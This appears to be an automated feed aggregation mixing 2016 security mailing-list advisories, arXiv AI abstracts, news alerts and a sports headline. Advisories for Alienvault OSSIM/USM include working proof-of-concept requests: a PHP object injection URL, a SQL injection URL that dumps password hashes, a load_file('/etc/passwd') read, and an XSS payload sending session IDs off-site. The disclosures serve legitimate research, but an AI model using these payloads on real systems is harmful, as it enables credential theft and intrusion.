Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the first entry in that series. The below information is also available on my blog at http://ift.tt/2e9pdmJ. There you can find a repro that triggered this issue in addition to the information below. Follow me on http://twitter.com/berendjanwever for daily browser bugs. MSIE 9 MSHTML CAttrArray use-after-free ======================================= (MS14-056, CVE-2014-4141) Synopsis

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-8580 - Alienvault OSSIM/USM Object Injection Vulnerability

Details ======= Product: Alienvault OSSIM/USM Vulnerability: PHP Object Injection Author: Peter Lapp, lappsec () gmail com CVE: CVE-2016-8580 Vulnerable Versions: <=5.3.1 Fixed Version: 5.3.2 Vulnerability Details ===================== A PHP object injection vulnerability exists in multiple widget files due to the unsafe use of the unserialize() function. The affected files include flow_chart.php, gauge.php, honeypot.php, image.php,inventory.php, otx.php, rss.php, security.php, siem.php, taxonomy.php, tickets.php, and url.php. An authenticated attacker could send a serialized PHP object to one of the vulnerable pages and potentially gain code execution via magic methods in included classes. POC ==== This benign POC injects the IDS_Report class from PHPIDS into the refresh parameter of image.php. The __toString method of IDS_Report is then executed and the output is displayed in the value of the content field in the response: /ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B} Timeline ======== 08/03/16 - Reported to Vendor 10/03/16 - Fixed in version 5.3.2 References ========== http://ift.tt/2ebIzHT

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-8581 - Alienvault OSSIM/USM Stored XSS Vulnerability

Details ======= Product: Alienvault OSSIM/USM Vulnerability: Stored XSS Author: Peter Lapp, lappsec () gmail com CVE: CVE-2016-8581 CVSS: 3.5 Vulnerable Versions: <=5.3.1 Fixed Version: 5.3.2 Vulnerability Details ===================== A stored XSS vulnerability exists in the User-Agent header of the login process. It's possible to inject a script into that header that then gets executed when mousing over the User-Agent field in Settings -> Current Sessions. POC === The POC uses jQuery to send all session IDs on the "Current Sessions" page to an arbitrary site (Google, in this case) Timeline ======== 08/03/16 - Reported to Vendor 10/03/16 - Fixed in version 5.3.2 References ========== http://ift.tt/2ebIzHT

Source: Gmail -> IFTTT-> Blogger

Neural Symbolic Machines: Learning Semantic Parsers on Freebase with Weak Supervision. (arXiv:1611.00020v1 [cs.CL])

Extending the success of deep neural networks to natural language understanding and symbolic reasoning requires complex operations and external memory. Recent neural program induction approaches have attempted to address this problem, but are typically limited to differentiable memory, and consequently cannot scale beyond small synthetic tasks. In this work, we propose the Manager-Programmer-Computer framework, which integrates neural networks with non-differentiable memory to support abstract, scalable and precise operations through a friendly neural computer interface. Specifically, we introduce a Neural Symbolic Machine, which contains a sequence-to-sequence neural "programmer", and a non-differentiable "computer" that is a Lisp interpreter with code assist. To successfully apply REINFORCE for training, we augment it with approximate gold programs found by an iterative maximum likelihood training process. NSM is able to learn a semantic parser from weak supervision over a large knowledge base. It achieves new state-of-the-art performance on WebQuestionsSP, a challenging semantic parsing dataset, with weak supervision. Compared to previous approaches, NSM is end-to-end, therefore does not rely on feature engineering or domain specific knowledge.

from cs.AI updates on arXiv.org http://ift.tt/2eZ8KDc
via IFTTT

Learning recurrent representations for hierarchical behavior modeling. (arXiv:1611.00094v1 [cs.AI])

We propose a framework for detecting action patterns from motion sequences and modeling the sensory-motor relationship of animals, using a generative recurrent neural network. The network has a discriminative part (classifying actions) and a generative part (predicting motion), whose recurrent cells are laterally connected, allowing higher levels of the network to represent high level phenomena. We test our framework on two types of data, fruit fly behavior and online handwriting. Our results show that 1) taking advantage of unlabeled sequences, by predicting future motion, significantly improves action detection performance when training labels are scarce, 2) the network learns to represent high level phenomena such as writer identity and fly gender, without supervision, and 3) simulated motion trajectories, generated by treating motion prediction as input to the network, look realistic and may be used to qualitatively evaluate whether the model has learnt generative control rules.

from cs.AI updates on arXiv.org http://ift.tt/2ebHXSA
via IFTTT

Robust Spectral Inference for Joint Stochastic Matrix Factorization. (arXiv:1611.00175v1 [cs.LG])

Spectral inference provides fast algorithms and provable optimality for latent topic analysis. But for real data these algorithms require additional ad-hoc heuristics, and even then often produce unusable results. We explain this poor performance by casting the problem of topic inference in the framework of Joint Stochastic Matrix Factorization (JSMF) and showing that previous methods violate the theoretical conditions necessary for a good solution to exist. We then propose a novel rectification method that learns high quality topics and their interactions even on small, noisy data. This method achieves results comparable to probabilistic techniques in several domains while maintaining scalability and provable optimality.

from cs.AI updates on arXiv.org http://ift.tt/2f7Z9Ny
via IFTTT

Local Subspace-Based Outlier Detection using Global Neighbourhoods. (arXiv:1611.00183v1 [cs.AI])

Outlier detection in high-dimensional data is a challenging yet important task, as it has applications in, e.g., fraud detection and quality control. State-of-the-art density-based algorithms perform well because they 1) take the local neighbourhoods of data points into account and 2) consider feature subspaces. In highly complex and high-dimensional data, however, existing methods are likely to overlook important outliers because they do not explicitly take into account that the data is often a mixture distribution of multiple components.

We therefore introduce GLOSS, an algorithm that performs local subspace outlier detection using global neighbourhoods. Experiments on synthetic data demonstrate that GLOSS more accurately detects local outliers in mixed data than its competitors. Moreover, experiments on real-world data show that our approach identifies relevant outliers overlooked by existing methods, confirming that one should keep an eye on the global perspective even when doing local outlier detection.

from cs.AI updates on arXiv.org http://ift.tt/2eZ8swm
via IFTTT

Towards Lifelong Self-Supervision: A Deep Learning Direction for Robotics. (arXiv:1611.00201v1 [cs.RO])

Despite outstanding success in vision amongst other domains, many of the recent deep learning approaches have evident drawbacks for robots. This manuscript surveys recent work in the literature that pertain to applying deep learning systems to the robotics domain, either as means of estimation or as a tool to resolve motor commands directly from raw percepts. These recent advances are only a piece to the puzzle. We suggest that deep learning as a tool alone is insufficient in building a unified framework to acquire general intelligence. For this reason, we complement our survey with insights from cognitive development and refer to ideas from classical control theory, producing an integrated direction for a lifelong learning architecture.

from cs.AI updates on arXiv.org http://ift.tt/2f7ZZcR
via IFTTT

Towards Blended Reactive Planning and Acting using Behavior Trees. (arXiv:1611.00230v1 [cs.RO])

In this paper, we study the problem of using a planning algorithm to automatically create and update a Behavior Tree (BT), controlling a robot in a dynamic environment. Exploiting the characteristic of BTs, in terms of modularity and reactivity, the robot continually acts and plans to achieve a given goal using a set of abstract actions and conditions. The construction of the BT is based on an extension of the Hybrid Backward-Forward algorithm (HBF) that allows us to refine the acting process by mapping the descriptive models onto operational models of actions, thus integrating the ability of planning in infinite state space of HBF with the continuous modular reactive action execution of BTs. We believe that this might be a first step to address the recently raised open challenge in automated planning: the need of a hierarchical structure and a continuous online planning and acting framework. We prove the convergence of the proposed approach as well as the absence of deadlocks and livelocks, and we illustrate our approach in two different robotics scenarios.

from cs.AI updates on arXiv.org http://ift.tt/2eZcqEZ
via IFTTT

Detecting Affordances by Visuomotor Simulation. (arXiv:1611.00274v1 [cs.AI])

The term "affordance" denotes the behavioral meaning of objects. We propose a cognitive architecture for the detection of affordances in the visual modality. This model is based on the internal simulation of movement sequences. For each movement step, the resulting sensory state is predicted by a forward model, which in turn triggers the generation of a new (simulated) motor command by an inverse model. Thus, a series of mental images in the sensory and in the motor domain is evoked. Starting from a real sensory state, a large number of such sequences is simulated in parallel. Final affordance detection is based on the generated motor commands. We apply this model to a real-world mobile robot which is faced with obstacle arrangements some of which are passable (corridor) and some of which are not (dead ends). The robot's task is to detect the right affordance ("pass-through-able" or "non-pass-through-able"). The required internal models are acquired in a hierarchical training process. Afterwards, the robotic agent is able to distinguish reliably between corridors and dead ends. This real-world result enhances the validity of the proposed mental simulation approach. In addition, we compare several key factors in the simulation process regarding performance and efficiency.

from cs.AI updates on arXiv.org http://ift.tt/2f83fFd
via IFTTT

Using Artificial Intelligence to Identify State Secrets. (arXiv:1611.00356v1 [cs.AI])

Whether officials can be trusted to protect national security information has become a matter of great public controversy, reigniting a long-standing debate about the scope and nature of official secrecy. The declassification of millions of electronic records has made it possible to analyze these issues with greater rigor and precision. Using machine-learning methods, we examined nearly a million State Department cables from the 1970s to identify features of records that are more likely to be classified, such as international negotiations, military operations, and high-level communications. Even with incomplete data, algorithms can use such features to identify 90% of classified cables with <11% false positives. But our results also show that there are longstanding problems in the identification of sensitive information. Error analysis reveals many examples of both overclassification and underclassification. This indicates both the need for research on inter-coder reliability among officials as to what constitutes classified material and the opportunity to develop recommender systems to better manage both classification and declassification.

from cs.AI updates on arXiv.org http://ift.tt/2eZ8DYe
via IFTTT

Separating Sets of Strings by Finding Matching Patterns is Almost Always Hard. (arXiv:1604.03243v2 [cs.CC] UPDATED)

We study the complexity of the problem of searching for a set of patterns that separate two given sets of strings. This problem has applications in a wide variety of areas, most notably in data mining, computational biology, and in understanding the complexity of genetic algorithms. We show that the basic problem of finding a small set of patterns that match one set of strings but do not match any string in a second set is difficult (NP-complete, W[2]-hard when parameterized by the size of the pattern set, and APX-hard). We then perform a detailed parameterized analysis of the problem, separating tractable and intractable variants. In particular we show that parameterizing by the size of pattern set and the number of strings, and the size of the alphabet and the number of strings give FPT results, amongst others.

from cs.AI updates on arXiv.org http://ift.tt/1VkQl5g
via IFTTT

Hadamard Product for Low-rank Bilinear Pooling. (arXiv:1610.04325v2 [cs.CV] UPDATED)

Bilinear models provide rich representations compared with linear models. They have been applied in various visual tasks, such as object recognition, segmentation, and visual question-answering, to get state-of-the-art performances taking advantage of the expanded representations. However, bilinear representations tend to be high-dimensional, limiting the applicability to computationally complex tasks. We propose low-rank bilinear pooling using Hadamard product for an efficient attention mechanism of multimodal learning. We show that our model outperforms compact bilinear pooling in visual question-answering tasks with the state-of-the-art results on the VQA dataset, having a better parsimonious property.

from cs.AI updates on arXiv.org http://ift.tt/2ed1inE
via IFTTT

[FD] CVE-2016-8582 - Alienvault OSSIM/USM SQL Injection Vulnerability

Details ======= Product: Alienvault OSSIM/USM Vulnerability: SQL Injection Author: Peter Lapp, lappsec () gmail com CVE: CVE-2016-8582 Vulnerable Versions: <=5.3.1 Fixed Version: 5.3.2 Vulnerability Details ===================== A SQL injection vulnerability exists in the value parameter of /ossim/dashboard/sections/widgets/data/gauge.php on line 231. By sending a serialized array with a SQL query in the type field, it's possible to execute an arbitrary SQL query. The result is not displayed on the screen, but it can be exploited as a blind SQLi or have the output directed to a file and then retrieved via another request. Authentication is required. POC === This request will dump user password hashes to a file: /ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F10.0.0.123_pass_tshark.pcap%27--+-%22%3B%7D The file containing the output can then be retrieved with the following request: /ossim/pcap/download.php?scan_name=pass&sensor_ip=10.0.0.123 It's also possible to read the contents of any file readable by the mysql user by using mysql's load_file function. For example, changing the request to something like select load_file('/etc/passwd') . Timeline ======== 08/03/16 - Reported to Vendor 10/03/16 - Fixed in version 5.3.2 References ========== http://ift.tt/2ebIzHT

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-8583 - Alienvault OSSIM/USM Reflected XSS

Details ======= Product: Alienvault OSSIM/USM Vulnerability: Reflected XSS Author: Peter Lapp, lappsec () gmail com CVE: CVE-2016-8583 Vulnerable Versions: <=5.3.1 Fixed Version: 5.3.2 Vulnerability Details ===================== Multiple GET parameters in the vulnerability scan scheduler of OSSIM/USM before 5.3.2 are vulnerable to reflected XSS. The parameters include jobname, timeout, sched_id, and targets[] in /ossim/vulnmeter/sched.php. POC === Example payload is: ">

Source: Gmail -> IFTTT-> Blogger

[FD] MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition Exploit [CVE-2016-6663 / OCVE-2016-5616]

CVE-2016-6663 / OCVE-2016-5616 Vulnerability: MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition Discovered by: Dawid Golunski @dawid_golunski http://legalhackers.com Affected versions: MariaDB < 5.5.52 < 10.1.18 < 10.0.28 MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 An independent research has revealed a race condition vulnerability which affects MySQl, MariaDB and PerconaDB databases. The vulnerability can allow a local system user with access to the affected database in the context of a low-privileged account (CREATE/INSERT/SELECT grants) to escalate their privileges and execute arbitrary code as the database system user (typically 'mysql'). Successful exploitation would allow an attacker to gain full read/write access to all of the files (including configuration files) and databases belonging to the affected database server. The obtained level of access upon the exploitation, could be chained with the other privilege escalation vulnerabilities discovered by the author of this advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges from mysql user to root user and thus allow attackers to fully compromise the target server. The full up-to-date advisory and a PoC exploit can be found at: http://ift.tt/2ftahpB PoC Video: http://ift.tt/2faWtMH

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Multiple SQL injection vulnerabilities in dotCMS (8x CVE)

User: anonymous is not authorized

I receive the error message “User: anonymous is not authorized” when attempting to access my Amazon Elasticsearch Service domain from the AWS ...

from Google Alert - anonymous http://ift.tt/2eYZPBB
via IFTTT

One Way B2B Marketers Should be Using Website Traffic (But Aren't)

Find out how you can shape your personalized marketing strategy using traffic data from anonymous B2B website visitors with this infographic.

from Google Alert - anonymous http://ift.tt/2fC2jtk
via IFTTT

SCANDAL!

Weiner, who clearly has serious personal problems, was too close to highly classified material that was transmitted between his wife and Hillary on an ...

from Google Alert - anonymous http://ift.tt/2fB8mhJ
via IFTTT

Ravens (3-4) up 1 spot to No. 20 in Week 9 NFL Power Rankings; next game Sunday vs. Steelers (4-3) (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Researchers Claim Wickr Patched Flaws but Didn't Pay Rewards

Topic: Researchers Claim Wickr Patched Flaws but Didn't Pay Rewards Source: http://ift.tt/2fwuXMj Wickr Inc Secret Messenger - Bug Bounty Program Vulnerabilities by Design - Wickr Inc - When honesty disappears behind the VCP Mountain - References: http://ift.tt/2eWDXHG Connected Articles: http://ift.tt/1NE78vp Playlist: https://www.youtube.com/playlist?list=PL2hn_NNM3yw-3svLm9UdSzvlVVZcx5DxV Tags: #security #vulnerability #wickr #exploitation #research #messenger #secret

Source: Gmail -> IFTTT-> Blogger

The Hacker News (THN) Celebrates 6th Anniversary Today

Can you believe that it's been 6 years since we first launched The Hacker News? Yes, The Hacker News is celebrating its sixth anniversary today on 1st November. We started this site on this same day back in 2010 with the purpose of providing a dedicated platform to deliver latest infosec news and threat updates for Hackers, Security researchers, technologists, and nerds. Times flies when

from The Hacker News http://ift.tt/2fqq5ct
via IFTTT

New IoT Botnet Malware Discovered; Infecting More Devices Worldwide

The whole world is still dealing with the Mirai IoT Botnet that caused vast internet outage last Friday by launching massive distributed denial of service (DDoS) attacks against the DNS provider Dyn, and researchers have found another nasty IoT botnet. Security researchers at MalwareMustDie have discovered a new malware family designed to turn Linux-based insecure Internet of Things (IoT)

from The Hacker News http://ift.tt/2fcyPOj
via IFTTT